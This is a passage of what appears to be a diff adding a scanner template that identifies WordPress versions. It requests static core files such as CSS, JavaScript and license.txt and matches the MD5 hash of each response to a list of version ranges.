dsl: + - "(\"dc4728d88b26a69d23c41eea46362cdb\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"3427781751e43fa30defb3c3686e0f4f\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"fd70aa581d90f2cf9f29ab3ed406e60a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-widgets.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"a3d193608a06b479ec5ef684d6281897\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"49f0ad63a90d6cf3146aef5f705361ad\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"a138d6e9d8e9b3d4d2a9eafff00f5ee5\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"952f708830650396ef92ebe8b1bfe4e5\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - 
"(\"8bb04d6e7cb432209ea569d82301f14a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7cec3fb121b9608cfb8c6a089bdc1a78\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"a4b28b10d15c63e0e9aacea727f2e954\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"1a76cb6fbbeea2d6d2f777a9a68c3950\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"f35e5a714f46d769b8dcb01fe6adf942\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a8fde8741e7a5eef99c890bcf80a1330\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"fa3f72f6943c0ef9f20b7af1febddf4b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"4e338ddee64e1284d5fc128c1d68d3ce\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"91fb0f195883f5a2160f8fbc3c972efc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-widgets-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"1ce61fc960a92535e1df36b9406849cb\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"7dd2a79d285e607be1ac31534fa8c6f1\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"e9eb10161f31b6b7d1771ee567fc135b\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2564cfc6fab696cf92ca7db8bf2bfc17\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"423dfcdad5293cfcebfa0ddeb2b61226\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7ab3411bcab95d99021791a7da6a39c8\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"a97de8b82ec8b15faf9b1d529d408527\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"770dc42adb777ab40a74fa6c5b23840c\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"e780700354f7e9e075448078b58814a9\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"13f8d82516b5553205c3be870508316b\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - 
"(\"19e5373be67edc6a75533b48fb484b9f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"d86d15f33703587a4af713132b2936be\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"19e9694fa284d071ca66669ad50ac87e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/zxcvbn.min.js" + matchers: + - type: dsl + name: 4.8 - 5.3.6 + dsl: + - "(\"a0ba2f2c8a1dd2594208e4f45b50b390\" == md5(body))" + - type: dsl + name: 3.8 - 4.7.19 + dsl: + - "(\"a14cd5113bd0d57563c1a9b63cae05f8\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"01bae5101bd40c4d24029dbfa20373d2\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"027c098ebca6235056092f7b954dfc5f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpautoresize/plugin.js" + matchers: + - type: dsl + name: 4.2 - 5.3.6 + dsl: + - "(\"640cbc0058638c4fb0400370dbcf25a3\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"dac11175ce0497c386f2ec1f2bb18983\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"d120118d8ed5d92bfdec395da0e05a49\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"0efc4bcc2e90416a5f996d9572236995\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/plugin.js" + matchers: + - type: dsl + name: 3.9 - 5.3.6 + dsl: + - "(\"06f7aecb5bdfa28739eea0a498d15a81\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"04e5571b65e28e863f92fc4ee3f07414\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/plugin.js" + matchers: + - type: dsl + name: 4.4 - 5.3.6 + dsl: + - "(\"9d48345044e6111fbeb9d2fb444d5c49\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"b10eadbf41e88b236ac764bd26e653f9\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"4d37465e93855c2c01c9c60c6dda689c\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - 
"(\"c71b815f13d17651385fc624cd3fa490\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/langs/wp-langs-en.js" + matchers: + - type: dsl + name: 4.1 - 5.3.6 + dsl: + - "(\"08f8669f7453b17563a62e6bbb376137\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"c1dbeecd27447d90fc2a188c58586ad3\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"260c1cc4baa6208fad1e01788c56e30b\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"7db3698995b52c5eccad285d5d790355\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"1bade867eefc05658954aed300779c6d\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"8dd6727e3c05b901c98c664b0387d684\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"61428dd239102f7c4e8cff821fed5a9f\" == md5(body))" + - type: dsl + name: 2.7 - 3.0.6 + dsl: + - "(\"6f3b5dc08823e70c717422e13b3ce1c9\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"aef70efd73e08f832ffa1871e08fb3d4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/farbtastic-rtl.css" + matchers: + - type: dsl + name: 3.8 - 5.3.6 + dsl: + - "(\"118f1189ffbb71e014402121b5456bc2\" == md5(body))" + - type: dsl + name: 2.8 - 3.2.1 + dsl: + - "(\"117dc1e6ac587635c98975cfcdfb0444\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"c188b80c09449490eeea135cbdbaa4f7\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"c2370ae59e15c0b0299a7b89ee93fb17\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/l10n-rtl.css" + matchers: + - type: dsl + name: 4.6 - 5.3.6 + dsl: + - "(\"69b0527be5b3aa2c1644fe5fc1c34afa\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"f39bf70450b95eb669ac26bb12f6a7d2\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"cabc44df7d4f2fa084496d62a1c9db53\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"fcb0063a38cf8348351737634db3f947\" == 
md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ed7b18351eecc9ba8b2b65e634696e40\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"53e5c8837adee91b40f85796824297c0\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"dc59fb5a6c510e3856c86d5d9df08328\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"17786dc78f167ce19373f8cac1a341bd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/iris.min.js" + matchers: + - type: dsl + name: 4.7 - 5.3.6 + dsl: + - "(\"45076064fdcbfcf9f5c8996e10ac4bc9\" == md5(body))" + - type: dsl + name: 4.1 - 4.6.20 + dsl: + - "(\"75c63560c640c4a6c31f5565dfb0e8a9\" == md5(body))" + - type: dsl + name: 3.8 - 4.0.32 + dsl: + - "(\"7407504e1137f61fd8a18ba18c82bc1b\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"d6537a873048d3725fb96cb99adc9b44\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"99948214c800f7f5cd08bdda7b31022e\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"f03190302132dd7dd43dc3c26ef616a4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/site-icon-rtl.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"06fa2062900ec9b9561403625050c939\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fedcbcc78a6bb0af907fb6f96903510e\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"651951a752929e9254b3599b8496029a\" == md5(body))" + - type: dsl + name: 4.9 - 5.3.6 + dsl: + - "(\"843b8077b07dce1d6bd532aa7ad3e61b\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"f8fc0b81fa9a174c90445282c90b2a99\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codemirror/csslint.js" + matchers: + - type: dsl + name: 4.9 - 5.3.6 + dsl: + - "(\"e1b73b2ee9f94bd0f0cace5f09fd8251\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"ebbcc94d5fcfb149e508a6b3f2c06cbd\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/js/tinymce/plugins/compat3x/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"8f0e27297dd73de76b24a8ee11ee683d\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"0bcfa3158493fcc012b28cc71cf62c12\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"5210cc9135346dcc15c9258eae55868a\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"790e3c426331bcdfbb33c636090b6194\" == md5(body))" + - type: dsl + name: 4.0 - 4.2.29 + dsl: + - "(\"3db45ca97f2d1bccc5c7ec65abbf8b55\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"751eb6f050f947374572ea1870482819\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.6 + dsl: + - "(\"2bdb6ec1c3d931d9ecbb169fcf6f5662\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"8fdf94194f514bb1519bea82ef95753e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/license.txt" + matchers: + - type: dsl + name: 4.5.5 - 4.9.1 + dsl: + - "(\"0d0434c8b176c525a6fce9cefdf8e106\" == md5(body))" + - type: dsl + name: 4.5 - 4.7 + dsl: + - "(\"a2b365a131a3aaa578bcce14ae9a0512\" == md5(body))" + - type: dsl + name: 3.9.15 - 4.4.14 + dsl: + - "(\"2c55b47570a0802d3ec40781d2d6adc9\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.5 + dsl: + - "(\"e6fa1601644f9ad7f2a8ed5f9671d0d5\" == md5(body))" + - type: dsl + name: 3.9.4 - 4.4 + dsl: + - "(\"3938fcd57688b4d7681a50d6a1f53e71\" == md5(body))" + - type: dsl + name: 3.9 - 4.1 + dsl: + - "(\"ae123513dd2e70337dafc9f57ece23fd\" == md5(body))" + - type: dsl + name: 3.7.6 - 3.8.16 + dsl: + - "(\"9f752d0964de81f51a66c7408f6a4253\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.5 + dsl: + - "(\"38770f444df2e78c4431ef84cc94b477\" == md5(body))" + - type: dsl + name: 3.7.17 - 3.8.25 + dsl: + - "(\"732b8b10f9f4e8af61ab94c713580149\" == md5(body))" + - type: dsl + name: 3.4 - 3.5.2 + dsl: + - "(\"b7d6694302f24cbe13334dfa6510fd02\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - 
"(\"405836dc36b41ce662dba3423eab616c\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f8ad8fa91c45e9979d7cb58adb3686f4\" == md5(body))" + - type: dsl + name: 2.7 - 3.0.6 + dsl: + - "(\"4d1f767863b6a3985f43e9401b0739f6\" == md5(body))" + - type: dsl + name: 1.2.1 - 2.6.5 + dsl: + - "(\"c36b8609197b74b10c3b2db0533c0e1e\" == md5(body))" + - type: dsl + name: 0.71-gold - 2.3.3 + dsl: + - "(\"00a58df11c81a717b7441ba853dbf85f\" == md5(body))" + - type: dsl + name: 4.5.14 - 5.0.2 + dsl: + - "(\"9348da52c104f75fe1befc73609020cf\" == md5(body))" + - type: dsl + name: 3.9.24 - 4.4.24 + dsl: + - "(\"f5847c886a3ea0cce59e06a502686989\" == md5(body))" + - type: dsl + name: 3.7.26 - 3.8.35 + dsl: + - "(\"0f5ad1c4e89f08d3553fbae4b1141009\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.3.6 + dsl: + - "(\"40fc2f39d472a1bb52f4ebe59702e0c2\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"ad4c696c2b7a3971393d00c67bac0d05\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/quicktags.js" + matchers: + - type: dsl + name: 4.8 - 5.0.11 + dsl: + - "(\"bb36c516f8fd9ecc5d05b750f92cc1ae\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"481e904dd706f51af4bf2faa4070165b\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"213aa843be923e9b3cd4e8231551d01d\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"f623cad23a3ce005fcd054d9e5adcaad\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"3ea535778aa41165e0b6fdbe1fa7c4b4\" == md5(body))" + - type: dsl + name: 3.9 - 4.0 + dsl: + - "(\"75a2b7d66218b95cc439cd82daea731d\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"7b69ef69e6e9a070b872a6f95ec9c457\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"2a040163533eceee9b05c95216bf6764\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"cb35ecf64895decdb22a0f1ae83e4e7c\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - 
"(\"77a0503d00ffbf740d3572411c676724\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"4f9b1ffdbbe292ae09a17bd5638c8152\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"522dd357ce0e14c054e91851be2c7326\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"954c48f2a654620e6c8c286d6016d224\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"b70c650cff9a2601ba9d9aebf1215a6e\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"30ef4fe9bbc2a3259b0a1179f8b3f5d8\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"05f72f5183487b3d93ffdea33f521cff\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"bee34afdddc81cd7fb4375bc1950a4c3\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"13fae754baf95c39371e539c4b627dde\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"f7f1cad5bc1ad060439835b57d263709\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"3a7dd5f21f0185d288509c11dad9adcc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpemoji/plugin.js" + matchers: + - type: dsl + name: 4.5 - 5.0.11 + dsl: + - "(\"f77a6131c150653ddfa17a568a1962d0\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"1d793200d7b3e0f80818903ca5721bc7\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"671c895cbc8044b1c6145fba999eea7a\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"5345ad90ee783d64afa87ec1b1ab654d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/accordion.js" + matchers: + - type: dsl + name: 4.3 - 5.0.11 + dsl: + - "(\"ef3fe33d4ce12fe5254e5af1025ce70a\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"f25e56e30af6382e3770be437493373a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"450d5207ff6942004d749e0ed59d8a16\" == md5(body))" + - type: dsl + name: 3.6 - 3.9.33 + dsl: + - 
"(\"481cc628a58bdbd7ac2e604321ae5fef\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"f2086c19efb64a0b66f05f46dd35ae9b\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"5d0833119cdd6d030e69e499b6ac26cc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/svg-painter.js" + matchers: + - type: dsl + name: 3.8 - 5.0.11 + dsl: + - "(\"87dcfbe97f902fa77cc4a9889c827afc\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"045eeffbb70b6f0cb98f444cd5b16c85\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"78b62a77d26a89151be971c140a1e382\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/custom-header.js" + matchers: + - type: dsl + name: 3.8 - 5.0.11 + dsl: + - "(\"32b3005887a4cb606fecc09c756605bb\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"955638fc743b925bb6425ac2c7e19903\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"bfdfbcd9ca2a53e91e857effb3410f0f\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"d02c557f15f702c040547ba4ebe7c21e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/gallery.js" + matchers: + - type: dsl + name: 4.4 - 5.0.11 + dsl: + - "(\"78cfa96506bf3965c18afa6de5b5abb6\" == md5(body))" + - type: dsl + name: 3.8 - 4.3.25 + dsl: + - "(\"1be9174b160c7eb40e6cdce4031ae89e\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"c46e25f07876b469e084d9b0696ea235\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"60bf226af2fd347b5a9deabe699a7a57\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"c18e6c65857266d2f189dbbf98374e43\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"59160556d01955e4eb91af2227f8722e\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"89772dfb0b8cc96168923a057ba97131\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"ee56b3e15c6013a01692799350229b75\" == md5(body))" + - type: dsl + name: 
2.6 - 2.6.5 + dsl: + - "(\"80af48faad6e78172a7a3f4b612afd64\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"63b104e2188b3c9504fc58e7773425ad\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"3f1cbb95c0a95ede44aa549021984e9e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media-upload.js" + matchers: + - type: dsl + name: 4.5 - 5.0.11 + dsl: + - "(\"94b464e9b4ec6b545486af795f24016d\" == md5(body))" + - type: dsl + name: 4.0 - 4.4.24 + dsl: + - "(\"5f66a88c118be462a566029db50aa3a2\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"da02ac15713968b6cff0bcafc4dfc0df\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"b2507d1ad5b4246899da37977f271477\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a3767f4e61a7fd4fc7733fa50cffcf8d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"8772e3e39912975229d15c246e828482\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"f119160af22c4dd7bd550b6392868678\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"a0f1e8bef23de300136e25af561cbe87\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"5cc83ad6cd63863e0dc5e20b810c9189\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"db178121dfb44e4208251c4723eb00c0\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"813637207d5f403cbc32feefb0ec32d7\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"7cbf5fe71bd15999b72f34671dfc4f6c\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"12e44ee24fd364725b547b797e72779c\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"5e579c9c6081deae17dffb254b4779aa\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"3fc8d4f8151f3ca1dc9804b947934218\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"983981007b91cd7973b474cbe0d3cf82\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/js/widgets/media-audio-widget.js" + matchers: + - type: dsl + name: 4.8 - 5.0.11 + dsl: + - "(\"9afcfed7095623b2c6a90ffb3ed2489f\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"1853c2371eabae2afccfb72a5523edbe\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"5020494ddd3b703801766eb3c75bf453\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/revisions.js" + matchers: + - type: dsl + name: 4.8 - 5.0.11 + dsl: + - "(\"8d1b4d8308f2fc136df5dd875ee5529f\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"4eb824b75d3e4d62bdc80a6d2a79a377\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"fd96dbd3b932f43a166651e4553cbf00\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"41f746a4087bec7e9b0db4152759d169\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"f6a37bc118b6b9c7b7b17617c1f969af\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"d86d279a545eca8e5e2b325b15f0a8e1\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"a80d81c448b0381a5e22fc7e4e09521e\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"a005233637f6f2564e710a0e4a5b0e1f\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"c5f20aa2e318716cc3b6f539c9528dd5\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"06814cc3d64f65157ab2bfb16e555219\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/shortcode.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"fc8cb580e0edc5cda1a550747d0de6c9\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"735f904b0d3315c8e51aca680bbb8056\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"eb207a02d03e3196d9d14ad139327fb5\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"457c14222f3c264b68ebcbe988e0efbf\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - 
"(\"7d4f49af7fc0f2a7f07b594bb280dff2\" == md5(body))" + - type: dsl + name: 3.8 - 3.9 + dsl: + - "(\"de6d7cb739e90fc6d6c43272bd0c3598\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"667dfe93afdf63592ca07ec403b05170\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"6e3848c6ea0f681f669a0c8f942bf41b\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"e97bf5b755c0c98bc63ed715b7fb3ff9\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"0540a810bff1d0c5e2c9507df353ce8a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/wp-mediaelement.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"8a628f94d5775fdf423f7cae30eb9453\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"1d889c99f04a39573d4be5b346c6272f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"3fc9c567b4fe652008ea1c14428c9363\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"9f38d89f0e227bebd5ba84ac75e10f5a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"95c1dc92db0652488b6b3f48c55e40d1\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"2ea532fa670298e162824a0142ae7b9a\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"f6d921a62cf96294281e0a202a017846\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"4e654df64f6c6971d29676c04eb5481a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"4e9e692fb1d6bf02e7032c52739a93e5\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"e781b3e173836b68d9c9d16e24fe66ac\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"03bd5bce1479cfa83e955c1392efb02e\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"7ff2281b44db7103a37cabdeca0880ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/utils.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - 
"(\"19ea0da213eda9c7bc4360f1d4c18b3c\" == md5(body))" + - type: dsl + name: 4.4 - 4.6.20 + dsl: + - "(\"b59e4faadb8e122faa031d99f1966ea4\" == md5(body))" + - type: dsl + name: 4.0 - 4.3.25 + dsl: + - "(\"01b7f89601bfa36ffee09f056f2cc38a\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"7ef14f85ee633c3aa2be8db18c23121a\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a5f4880c9cca30561e9290f0dafda128\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"0cb234c48b5a81baaaaa30f570199d9d\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"3328e64dc78c8f83b8a976dd416b1269\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"06048f8ea732a49aa4215b704e49e935\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-video-widget.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"1574427094b8df449b4c21384fa2729d\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"133a39bd8c47630947212e04dc47672a\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - 